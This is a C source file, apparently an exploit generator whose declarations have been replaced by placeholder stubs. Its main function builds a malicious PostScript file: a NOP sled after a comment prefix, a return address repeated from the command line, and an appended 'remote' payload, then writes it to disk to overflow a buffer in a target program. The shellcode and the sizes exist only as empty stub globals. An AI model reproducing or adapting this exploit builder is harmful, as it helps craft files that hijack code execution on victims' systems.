
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_long ;
typedef int retaddr ;


 int BS ;
 int EXIT_FAILURE ;
 scalar_t__ NNOPS ;
 int NOP ;
 int OUTFILE ;
 int O_CREAT ;
 int O_EXCL ;
 int O_RDWR ;
 char* PS_COMMENT ;
 int RETADDR_BYTES ;
 int close (int) ;
 int die (char*) ;
 int fprintf (int ,char*,char*) ;
 int memcpy (char*,int *,int) ;
 int memset (char*,int ,int) ;
 int open (int ,int,int) ;
 char* remote ;
 int sscanf (char*,char*,int *) ;
 int stderr ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 scalar_t__ write (int,char*,int) ;

int main(int argc, char **argv)
{
    int len, x, fd;
    char buf[BS];
    u_long retaddr;

    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr >\n", argv[0]);
        return EXIT_FAILURE;
    }
    sscanf(argv[1], "%lx", &retaddr);


    memset(buf, NOP, BS);
    strcpy(buf, PS_COMMENT);
    len = strlen(buf);
    for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
        memcpy(buf+x+len, &retaddr, sizeof(retaddr));
    len += x + NNOPS;
    strcpy(buf+len, remote);
    strcat(buf+len, "\n");
    len += strlen(remote) + 1;


    if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)
        die("open");

    if(write(fd, buf, len) < 0)
        die("write");

    close(fd);

    return 0;
}
